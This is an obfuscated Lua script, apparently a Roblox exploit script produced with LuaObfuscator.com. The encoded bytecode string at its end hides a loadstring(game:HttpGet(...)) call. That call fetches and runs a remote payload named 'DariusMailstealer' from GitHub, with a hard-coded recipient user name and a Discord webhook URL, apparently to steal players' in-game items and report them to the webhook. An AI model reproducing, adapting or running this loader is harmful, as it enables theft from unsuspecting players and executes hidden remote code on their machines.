--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((879 -(282 + 595))^(v32-1)))%((3 -1)^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-1)) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;end end else local v84=(570 -(367 + 32 + 169))^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (1==v34) then return (v38 * (23917454 -7140238)) + (v37 * ((67558 -(892 + 65)) -(68 + 997))) + (v36 * (1526 -(226 + 1044))) + v35 ;end if (((0 -0) -0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + ((27 + 93) -(32 + 85)) );v19=v19 + 4 + 0 ;v34=1;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39~=0) then else v40=0;v41=nil;v39=1 + 0 ;end if (v39==1) then v42=nil;v43=nil;v39=4 -2 ;end if (v39==(1003 -(451 + 549))) then v46=nil;while true do local v91=14 -(9 + 5) ;local v92;while true do if (v91==(0 + 0)) then v92=0;while true do if (v92==(377 -(85 + 291))) then if (v40~=0) then else local v148=0;local v149;while true do if (v148==(1265 -(243 + 1022))) then v149=0 -0 ;while true do if (v149~=(0 -0)) then else local v175=0;while true do if (v175~=(0 + 0)) then else v41={};v42={};v175=1181 -(1123 + 57) ;end if (v175==(1 + 0)) then v149=1 + 0 ;break;end end end if (v149==(1 -0)) then v43={};v44={v41,v42,nil,v43};v149=2;end if (v149~=2) then else v40=1 + 0 ;break;end end break;end end end break;end if (v92==(0 + 0)) then local v105=0 + 0 ;while true do if (v105~=(0 -0)) then else if (v40==1) then local v168=0;local v169;while true do if (v168==(0 -0)) then v169=0 + 0 ;while true do if (v169==2) then v40=2;break;end if (v169==(0 -0)) then local v176=560 -(306 + 254) ;while true do if (v176==(1 + 0)) then v169=1475 -(1329 + 145) ;break;end if (v176==(971 -(140 + 831))) then v45=v24();v46={};v176=1 + 0 ;end end end if (v169==1) then for v183=1,v45 do local v184=0 -0 ;local v185;local v186;local v187;local v188;while true do if (v184==(1851 -(1409 + 441))) then v187=nil;v188=nil;v184=720 -(15 + 703) ;end if ((0 + 0)==v184) then v185=0 -0 ;v186=nil;v184=1 + 0 ;end if (2==v184) then while true do if ((290 -(60 + 230))~=v185) then else local v194=572 -(426 + 146) ;while true do if (v194==(439 -(262 + 176))) then v185=1722 -(345 + 1376) ;break;end if (v194==(688 -(198 + 490))) then v186=1456 -(282 + 1174) ;v187=nil;v194=4 -3 ;end end end if (v185==(2 -1)) then v188=nil;while true do if (v186~=(1206 -(696 + 510))) then else v187=v22();v188=nil;v186=1 -0 ;end if (v186~=(1263 -(1091 + 171))) then else if (v187==1) then v188=v22()~=0 ;elseif (v187==(1 + 1)) then v188=v25();elseif (v187==(1254 -(721 + 530))) then v188=v26();end v46[v183]=v188;break;end end break;end end break;end end end v44[3]=v22();v169=1273 -(945 + 326) ;end end break;end end end if (v40~=(6 -4)) then else for v170=1,v24() do local v171=0 -0 ;local v172;while true do if (v171~=(374 -(123 + 251))) then else v172=v22();if (v21(v172,4 -3 ,699 -(208 + 490) )~=(0 + 0)) then else local v178=1500 -(1408 + 92) ;local v179;local v180;local v181;local v182;while true do if (v178~=(1086 -(461 + 625))) then else v179=0 + 0 ;v180=nil;v178=837 -(660 + 176) ;end if (v178==(1 + 0)) then v181=nil;v182=nil;v178=2;end if (2~=v178) then else while true do if ((0 + 0)==v179) then local v189=202 -(14 + 188) ;while true do if (v189~=(1 + 0)) then else v179=1 + 0 ;break;end if (v189==0) then local v197=0;while true do if (v197==(675 -(534 + 141))) then v180=v21(v172,1 + 1 ,532 -(406 + 123) );v181=v21(v172,1773 -(1749 + 20) ,3 + 3 );v197=1 + 0 ;end if (v197~=(1 + 0)) then else v189=1146 -(466 + 679) ;break;end end end end end if ((4 -2)~=v179) then else local v190=0;local v191;while true do if (v190==(0 -0)) then v191=0 + 0 ;while true do if ((0 -0)==v191) then if (v21(v181,1 -0 ,2 -1 )==(2 -1)) then v182[116 -(4 + 110) ]=v46[v182[586 -(57 + 527) ]];end if (v21(v181,2 + 0 ,2)~=(1 + 0)) then else v182[3]=v46[v182[399 -(115 + 281) ]];end v191=104 -(17 + 86) ;end if (v191==1) then v179=3;break;end end break;end end end if (v179==3) then if (v21(v181,3 + 0 ,3)==(2 -1)) then v182[4]=v46[v182[4 + 0 ]];end v41[v170]=v182;break;end if (v179==(2 -1)) then local v193=0;while true do if (v193==(3 -2)) then v179=869 -(550 + 317) ;break;end if (v193~=(0 -0)) then else v182={v23(),v23(),nil,nil};if (v180==(285 -(134 + 151))) then local v199=0;local v200;local v201;while true do if (v199==(1 + 0)) then while true do if (v200~=(0 -0)) then else v201=0;while true do if (v201~=(1665 -(970 + 695))) then else v182[3 + 0 ]=v23();v182[1261 -(1043 + 214) ]=v23();break;end end break;end end break;end if ((0 -0)==v199) then v200=0 -0 ;v201=nil;v199=1991 -(582 + 1408) ;end end elseif (v180==(1213 -(323 + 889))) then v182[7 -4 ]=v24();elseif (v180==2) then v182[583 -(361 + 219) ]=v24() -((322 -(53 + 267))^(55 -39)) ;elseif (v180==(416 -(15 + 398))) then local v208=0;local v209;while true do if (0==v208) then v209=982 -(18 + 964) ;while true do if (v209==0) then v182[3]=v24() -((2 -0)^(60 -44)) ;v182[1828 -(1195 + 629) ]=v23();break;end end break;end end end v193=1;end end end end break;end end end break;end end end for v173=1 -0 ,v24() do v42[v173-(242 -(187 + 54)) ]=v29();end return v44;end v105=781 -(162 + 618) ;end if (v105~=(1 + 0)) then else v92=1 + 0 ;break;end end end end break;end end end break;end if (v39==(3 -1)) then v44=nil;v45=nil;v39=4 -1 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1;local v50=(v21(v48,1,2 + 18 ) * ((740 -(542 + 196))^(68 -36))) + v47 ;local v51=v21(v48,7 + 9 + 5 ,16 + 15 );local v52=((v21(v48,12 + 20 )==1) and  -(2 -1)) or (2 -1) ;if (v51==(1551 -(1126 + 425))) then if (v50==(405 -(118 + 287))) then return v52 * (0 -(0 + 0)) ;else local v93=1121 -(118 + 573 + 430) ;while true do if (v93==(0 -(0 -0))) then v51=378 -(142 + 235) ;v49=0;break;end end end elseif (v51==(9286 -7239)) then return ((v50==(0 + 0)) and (v52 * (1/(977 -(553 + 424))))) or (v52 * NaN) ;end return v8(v52,v51-(1933 -910) ) * (v49 + (v50/((2 + (0 -0))^(52 + 0)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then local v85=0 -(0 + 0) ;while true do if (v85==(0 + 0)) then v53=v24();if (v53==(0 -0)) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;local v55={};for v66=(2083 -(797 + 532)) -(239 + 514) , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 1 + 1 ;return (v58 * 256) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v59,16));if v20 then local v98=v5(v87,v20);v20=nil;return v98;else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then local v99=0;while true do if (v99==2) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v99=3;end if (v99==1) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v99=2;end if (v99==0) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v99=1;end if (v99==4) then v72=v80[3];break;end if (v99==3) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v99=4;end end elseif (v81>1) then v78[v80[2]]();elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=3) then do return;end elseif (v81>4) then local v106=v80[2];v78[v106]=v78[v106](v13(v78,v106 + 1 ,v73));elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end elseif (v81<=8) then if (v81<=6) then local v100=0;local v101;local v102;local v103;local v104;while true do if (v100==0) then v101=v80[2];v102,v103=v71(v78[v101](v13(v78,v101 + 1 ,v80[3])));v100=1;end if (v100==2) then for v154=v101,v73 do v104=v104 + 1 ;v78[v154]=v102[v104];end break;end if (v100==1) then v73=(v103 + v101) -1 ;v104=0;v100=2;end end elseif (v81==7) then local v108=0;local v109;local v110;while true do if (v108==1) then v78[v109 + 1 ]=v110;v78[v109]=v110[v80[4]];break;end if (v108==0) then v109=v80[2];v110=v78[v80[3]];v108=1;end end else v72=v80[3];end elseif (v81<=10) then if (v81>9) then local v112;local v113,v114;local v115;local v116;v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v115=v78[v80[3]];v78[v116 + 1 ]=v115;v78[v116]=v115[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v113,v114=v71(v78[v116](v13(v78,v116 + 1 ,v80[3])));v73=(v114 + v116) -1 ;v112=0;for v145=v116,v73 do v112=v112 + 1 ;v78[v145]=v113[v112];end v72=v72 + 1 ;v80=v68[v72];v116=v80[2];v78[v116]=v78[v116](v13(v78,v116 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else v78[v80[2]]=v80[3];end elseif (v81==11) then v78[v80[2]]=v80[3]~=0 ;else v62[v80[3]]=v78[v80[2]];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03093O00557365724E616D653203063O006F6C702O3072030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F636F6465723534392F446172697573536372697074732F6D61696E2F4461726975734D61696C737465616C657203083O00557365724E616D65030E3O004775692O6C6F64696E6F3132333403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313730363O3837333432393436372O32392F4839615652347732394439326B6352484F36484E5258366C37326A436946566F73427962615047414844614F58544D7A737152336D50794776675968385342647A35554400173O0012093O00013O0026013O000E000100020004083O000E0001001209000100043O00120A000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026013O0001000100010004083O000100010012090001000A3O00122O000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100012O00033O00017O00",v9(),...);
